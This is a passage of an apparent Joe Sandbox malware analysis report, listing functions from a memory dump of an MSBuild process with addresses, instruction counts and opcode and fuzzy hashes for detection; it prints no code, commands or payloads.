                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1a11eeb1126904b8f0805871497b7cdd0aefe4e1234c092aac08b6887803a0ef
                                                                                                              • Instruction ID: 46c60b0f0b56d0afe5678c2c1e874a89a2c02b2c78dd54116d6e0baf7aa471a2
                                                                                                              • Opcode Fuzzy Hash: 1a11eeb1126904b8f0805871497b7cdd0aefe4e1234c092aac08b6887803a0ef
                                                                                                              • Instruction Fuzzy Hash: 56410171E0961AEFCB0ADF18C8406ACB7B1BF14764F248229D811A72C0DBB1EC518BD0
                                                                                                              Function 011905A7 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 252574f9d34a412f7868fd95d92743d79e01959f172e9ec2e875b4896f9b46e4
                                                                                                              • Instruction ID: 099f66843f8d20988d455c0cae4a49692201689656a7c4d2277dda70d4b28e51
                                                                                                              • Opcode Fuzzy Hash: 252574f9d34a412f7868fd95d92743d79e01959f172e9ec2e875b4896f9b46e4
                                                                                                              • Instruction Fuzzy Hash: F141C1726046469FD728DF6CC840A6AB7E9FFC8700F140A2DF9A4D7680E730E914C7A6
                                                                                                              Function 01114859 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 449c4fda117e2a331029fdab49f5b03c5ae9a16b93ecc8f15375fdb09a1c3a20
                                                                                                              • Instruction ID: d538ecc58fc4310a5c6cf93ef72df12d61426cabc2c5bfc302c57bd09d299c3c
                                                                                                              • Opcode Fuzzy Hash: 449c4fda117e2a331029fdab49f5b03c5ae9a16b93ecc8f15375fdb09a1c3a20
                                                                                                              • Instruction Fuzzy Hash: E741E3302003068BD72DCF18D884B2AFBEAEF89B64F14453DE6458B695EB70D811CB91
                                                                                                              Function 01108B50 Relevance: .1, Instructions: 111COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b35a49cb53fd1c9eb362e560b426fa474db4a5ea4be6c8f48ee7b2fcc11fa95f
                                                                                                              • Instruction ID: ff26b8fb88c061e974fd29f0af5203d2a679a0e28daf88b37ab6996032197a13
                                                                                                              • Opcode Fuzzy Hash: b35a49cb53fd1c9eb362e560b426fa474db4a5ea4be6c8f48ee7b2fcc11fa95f
                                                                                                              • Instruction Fuzzy Hash: C041C171E05615CFCB1EDF69C9809DDBBF1FF88324B21862ED466A7290DB71A941CB40
                                                                                                              Function 011202E1 Relevance: .1, Instructions: 106COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction ID: 3acfa3f11010230646204be4ef54cdd30c01735cc3d17bf970be1188ee9cb4d9
                                                                                                              • Opcode Fuzzy Hash: d45b632d2c88e3b1d2b0a33d4d0818ae25320c4cce4feeb98528bfb7bef810ab
                                                                                                              • Instruction Fuzzy Hash: F3312532A08255AFDB1A8B68CC40BABBBF9AF18350F0442A5F815D7352C3749884CBA1
                                                                                                              Function 011BE3DB Relevance: .1, Instructions: 105COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 85e49906683a71007ae8cf3409e2ab4c38a39cf5391314b48b4dfce811399be6
                                                                                                              • Instruction ID: d60682b41acbd9b7ebf10760ab3de1bf8444253fef876416b753c012715539b5
                                                                                                              • Opcode Fuzzy Hash: 85e49906683a71007ae8cf3409e2ab4c38a39cf5391314b48b4dfce811399be6
                                                                                                              • Instruction Fuzzy Hash: 5031B935751716ABDB2A9F658C81FEB7AA5AB58B54F000028F600EB391DBB8DC01C7A0
                                                                                                              Function 011C4B4B Relevance: .1, Instructions: 104COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 06d1167d642914e2c4545a925bcf297a76db2411269bd9127999176991169a3c
                                                                                                              • Instruction ID: fe4957434c4b23c5ce41e8d2bf534c4ec5c9c73cf06d020057550a14cf0455db
                                                                                                              • Opcode Fuzzy Hash: 06d1167d642914e2c4545a925bcf297a76db2411269bd9127999176991169a3c
                                                                                                              • Instruction Fuzzy Hash: 2331E3326092118FC329DF19D8A4F5AB7E6FB95720F0A446DE9958BA62D730A810CB85
                                                                                                              Function 01114260 Relevance: .1, Instructions: 102COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1402b08d2f25e47b0488c444b1cfd2f57ecea49c59272198d26ea80b5f7bf5bd
                                                                                                              • Instruction ID: 7ad7f2fbd5c9906e0104e71a2473b2bff6a699b36a6313d55ffc76c38e8925bb
                                                                                                              • Opcode Fuzzy Hash: 1402b08d2f25e47b0488c444b1cfd2f57ecea49c59272198d26ea80b5f7bf5bd
                                                                                                              • Instruction Fuzzy Hash: A4419F32200B45DFD72ACF28C885BDABBE5AF49754F018429F69A8B760D774E904CB90
                                                                                                              Function 011C4BB0 Relevance: .1, Instructions: 101COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 2bd38c7ef3ae16ed27ad624ee9f80f21e954c7352f63437e4c6540fd7abe1002
                                                                                                              • Instruction ID: 09aa66f929d14db5c7ba895c8ca6af3818ea559453875206a0cf4ff10696525d
                                                                                                              • Opcode Fuzzy Hash: 2bd38c7ef3ae16ed27ad624ee9f80f21e954c7352f63437e4c6540fd7abe1002
                                                                                                              • Instruction Fuzzy Hash: B931D0716083028FD328DF28D8A0E6AB7E5FB94B20F05452DF9558BB61E730EC10CB96
                                                                                                              Function 0118EB1D Relevance: .1, Instructions: 100COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7650522e698eff5fb1acd3c85305210811b9f834f70bea15fb2b551515cbc2a4
                                                                                                              • Instruction ID: f726ba7a6960e3dfc5fda018ad1d46b46a65b6e6fe2e3d2be36efe831627f5ea
                                                                                                              • Opcode Fuzzy Hash: 7650522e698eff5fb1acd3c85305210811b9f834f70bea15fb2b551515cbc2a4
                                                                                                              • Instruction Fuzzy Hash: 8231F5317026C69BF32E775DCD48B257BD8BF45B48F1D40A0EB558B6D2DB28D880CA21
                                                                                                              Function 011D61C3 Relevance: .1, Instructions: 97COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 52c6c5648a046f9039b38ace09fe0bc33110cca892dd34b27740de07afeecf97
                                                                                                              • Instruction ID: e519536a830c89ac9745beb953c7511892e2b8c8040b38b84b351f4f6b52e870
                                                                                                              • Opcode Fuzzy Hash: 52c6c5648a046f9039b38ace09fe0bc33110cca892dd34b27740de07afeecf97
                                                                                                              • Instruction Fuzzy Hash: A931E475A0022AEBDB19DF98CC40FAEB7B5FB48B44F554169E900EB244D770ED41CBA4
                                                                                                              Function 011B483A Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b606e992f36bd95c41b62023134d917bfe6d15f95102cfc949a48248f2209c00
                                                                                                              • Instruction ID: 025d79a5861cb08c8a5db343e4116511bea4b9579f2438e740a1c470278b6d18
                                                                                                              • Opcode Fuzzy Hash: b606e992f36bd95c41b62023134d917bfe6d15f95102cfc949a48248f2209c00
                                                                                                              • Instruction Fuzzy Hash: 83316376A4112DABCF25DF54DC84BDEBBBAAB9C310F1040A5E909A7251DB30DE91CF90
                                                                                                              Function 0113EB20 Relevance: .1, Instructions: 96COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8d7fe1a9c27208954a6e7bd91e15fddd79deb33389c87889be9213be221f80f7
                                                                                                              • Instruction ID: 8d5dd5231050b9a47cd831fa09481f95e8e505a0adb50a964ad83b2f6ba18f5e
                                                                                                              • Opcode Fuzzy Hash: 8d7fe1a9c27208954a6e7bd91e15fddd79deb33389c87889be9213be221f80f7
                                                                                                              • Instruction Fuzzy Hash: C531B572E01315EFDB2ADFA9CC40AAFBBB9EF48750F114425E925D7258D3709E018BA1
                                                                                                              Function 011D60B8 Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 1939cb56ec00819e0229f6b867d546bd84145b7a54f2e69b48e95c04e4724cc0
                                                                                                              • Instruction ID: c09819f51731907209ea4e64b2325f597921a0eeb56f8f4cdf490646c61850f2
                                                                                                              • Opcode Fuzzy Hash: 1939cb56ec00819e0229f6b867d546bd84145b7a54f2e69b48e95c04e4724cc0
                                                                                                              • Instruction Fuzzy Hash: F731D471A00616EFDB1A9FA9C850B6EB7B9AF84758F114069E505EB382DB30DC01CB90
                                                                                                              Function 011107AF Relevance: .1, Instructions: 95COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: d2f91d91084df2482cc4861dcd4d2ce905d5b9dc4df788ec5481a88b8452d309
                                                                                                              • Instruction ID: 1a12b1ae486b6f3b4f25fd93aef36bf3e539572ac63bda4749fee1b889abbbcb
                                                                                                              • Opcode Fuzzy Hash: d2f91d91084df2482cc4861dcd4d2ce905d5b9dc4df788ec5481a88b8452d309
                                                                                                              • Instruction Fuzzy Hash: BD31F632E09612DBC71EDE288840A6BFBA5AF9C250F02453DFD5597258DB30DC518BD2
                                                                                                              Function 01118550 Relevance: .1, Instructions: 94COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 4026a586d1b5abc87a677043370f1b3ba35f7e5c7c8ae0c5f2806733339a3dba
                                                                                                              • Instruction ID: f6b7ff84396962b05e4dc2efbc1d8ed3dddd141ce9277059deb0f01dd2ff17d9
                                                                                                              • Opcode Fuzzy Hash: 4026a586d1b5abc87a677043370f1b3ba35f7e5c7c8ae0c5f2806733339a3dba
                                                                                                              • Instruction Fuzzy Hash: 9A318C716093018FE769CF19C840B2AFBE5FB98710F05896DE9889B395D771E844CBA2
                                                                                                              Function 0114A6C7 Relevance: .1, Instructions: 92COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction ID: 3bffa75244399d96b685435239d353b905fb47928e992f6a5dbe6f24d48ba5f4
                                                                                                              • Opcode Fuzzy Hash: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
                                                                                                              • Instruction Fuzzy Hash: 773116B2B00B01AFE779CF69DD41B56BBF8AF08A50F05492DA59BC3651E731E900CB60
                                                                                                              Function 011BEBD0 Relevance: .1, Instructions: 91COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f405bf9c81d9e21bff1e097195d40dbb978d683f12e7057b55ad14fb34518a92
                                                                                                              • Instruction ID: 24a9b977b8f5d44ff17655be6acc562fff758e292ee8ee0dcbdee3a053a6fc99
                                                                                                              • Opcode Fuzzy Hash: f405bf9c81d9e21bff1e097195d40dbb978d683f12e7057b55ad14fb34518a92
                                                                                                              • Instruction Fuzzy Hash: 9C31AF71516341CFC71ADF19C58089ABBF1FF89218F044AAEE4889B352E331D955CF92
                                                                                                              Function 0113438F Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 059ae904e084a35d814caf02967933c1ba69b477538e14dfb368989ecf47814c
                                                                                                              • Instruction ID: b03712ba13797338d6b7dee75a1b4ecdbc481de806ff12f473fc8cd163164efd
                                                                                                              • Opcode Fuzzy Hash: 059ae904e084a35d814caf02967933c1ba69b477538e14dfb368989ecf47814c
                                                                                                              • Instruction Fuzzy Hash: 1731D432B00205DFD728EFA8C984AAEBBFAAFC4708F008539D645D7A58D734D945CB90
                                                                                                              Function 0110CB7E Relevance: .1, Instructions: 89COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction ID: cdb2280701b0d6532f02ad22fa068fcd724053f3bc43e029ab6bdb69028e9f43
                                                                                                              • Opcode Fuzzy Hash: 8cd4161f5b4d08ac4698b36444b06603346f514182f58bb0feca1d395408faf4
                                                                                                              • Instruction Fuzzy Hash: 5E213932E4425BAADB099BB9C800BEFBBB9AF55740F0681759E15F7340E3B1C9008BD0
                                                                                                              Function 0110C156 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: fa30deed080a61123e2db890cb2634e429af63332e565328c04cc4169d1d3f56
                                                                                                              • Instruction ID: 43debac71aa5f0d4305376c20475255c48de98906b76f0c5149290424374bc0c
                                                                                                              • Opcode Fuzzy Hash: fa30deed080a61123e2db890cb2634e429af63332e565328c04cc4169d1d3f56
                                                                                                              • Instruction Fuzzy Hash: A8318E716002108BDB39AF58DC40BA977B8FF50308F44C1A9DD859B346DB79DC92CB90
                                                                                                              Function 011CC3CD Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction ID: 1572081c0bd21cc3acc23a3377b08fee8cc337331563d45459b75eec2d584901
                                                                                                              • Opcode Fuzzy Hash: 7f3ac7f511b12b6545c220c591282cbbe50732f4b841637f95eeaa606406b8f4
                                                                                                              • Instruction Fuzzy Hash: 0C21DE36600A52A6CB1D9B95C810BBAFB75EF60B14F40C41EFAA987D51E734DD50C7E0
                                                                                                              Function 0110E420 Relevance: .1, Instructions: 88COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f6e87c1760fd629674a21123ca88320bd59128d05a8e547a61f1d763f4b15373
                                                                                                              • Instruction ID: ecafa856b2a520d813ce82ca6927d1e022eea7e52e6a67cc0ecf517e46ceb68b
                                                                                                              • Opcode Fuzzy Hash: f6e87c1760fd629674a21123ca88320bd59128d05a8e547a61f1d763f4b15373
                                                                                                              • Instruction Fuzzy Hash: 7E31E431E0212C9BDB3A9F19CC41BEEB7B9EB15744F0208A1E655E72D0D7B49E808F91
                                                                                                              Function 01144588 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction ID: 252926fd4fce614b9eb26487da5fd88b0e8cb7e7d5f270d790fb23cd0e7fee0f
                                                                                                              • Opcode Fuzzy Hash: 889ecffd1a06a090bd79871a4c0fdf01ee42b751b4f666e31dccfc06bb2b9632
                                                                                                              • Instruction Fuzzy Hash: CB217131A01609EBCB19CF58D980A9EBBB5FF48B14F108065EE159F641D771EA058B90
                                                                                                              Function 011444B0 Relevance: .1, Instructions: 87COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 641e64014b9dcb1c74debf083a6acc0345afb882a713046306bb6aa7bc47eaed
                                                                                                              • Instruction ID: 7de9804599d9bf68e0089a77a2cf7a59676d7a0d2a9ab227d34fdea9f24e10b8
                                                                                                              • Opcode Fuzzy Hash: 641e64014b9dcb1c74debf083a6acc0345afb882a713046306bb6aa7bc47eaed
                                                                                                              • Instruction Fuzzy Hash: E421BF726047459BCB2ADF18C880B6B77E4FF88B60F054519FD589FA45D730E9018BE2
                                                                                                              Function 0110E388 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction ID: 2933b42b7c74af46af5606472028c39e30de422f24be658130f9bd1621949cb0
                                                                                                              • Opcode Fuzzy Hash: 0cf2ef89ce765565c41e30a718174bbd4c2b265194fcbe27392bd3351cdfdb09
                                                                                                              • Instruction Fuzzy Hash: 4F31BE31A00605EFDB2ACF69C884F6ABBB9EF44314F1148A8E551CB281E770ED02CB50
                                                                                                              Function 0118E609 Relevance: .1, Instructions: 86COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: deafb255d1f63836742150c9c48bf34158f7c4381bbc3418d04f900a2135a771
                                                                                                              • Instruction ID: f42ab937cf332ffe121906c7ed1db51be278f3fb0d0be8888ba800d4529bf3ea
                                                                                                              • Opcode Fuzzy Hash: deafb255d1f63836742150c9c48bf34158f7c4381bbc3418d04f900a2135a771
                                                                                                              • Instruction Fuzzy Hash: 97318D75A00206DFCB1DDF18C8849AEB7B5FF84708F258559E8099B391E771EA50CF91
                                                                                                              Function 011906F1 Relevance: .1, Instructions: 79COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 11fd200ed1064d1585875e4c225339a7e398001b3b2657737ce1bc58fe2e1ad4
                                                                                                              • Instruction ID: 25699cec54e3ff691a419f9e64885cec13ca02f64d7aac3a6bf5eab1d8d4a32a
                                                                                                              • Opcode Fuzzy Hash: 11fd200ed1064d1585875e4c225339a7e398001b3b2657737ce1bc58fe2e1ad4
                                                                                                              • Instruction Fuzzy Hash: DA21B171900529DBCF29DF59C881ABEB7F8FF48754F500069F951AB240E778AD51CBA0
                                                                                                              Function 0119019F Relevance: .1, Instructions: 78COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: cbb7067e69b7e63aa49906ca90d4f5351a8849e70510649028cf542d9a6755ea
                                                                                                              • Instruction ID: 8b55134d3fe8ca03743c41fb0fc8701984f0f3b2d6669cab20723a97ff2d1afd
                                                                                                              • Opcode Fuzzy Hash: cbb7067e69b7e63aa49906ca90d4f5351a8849e70510649028cf542d9a6755ea
                                                                                                              • Instruction Fuzzy Hash: 8E21AB71600615ABDB19DB68C840A6AB7A8FF4C744F140069F914D7691E738ED10CB64
                                                                                                              Function 01190283 Relevance: .1, Instructions: 74COMMON
                                                                                                              Download Yara Rule
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000005.00000002.2353002978.00000000010E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 010E0000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_5_2_10e0000_MSBuild.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: f8eb0b5f2313455e0721895c15ef74662b4c1bfd33e2d839ac75ffa745b8ad98
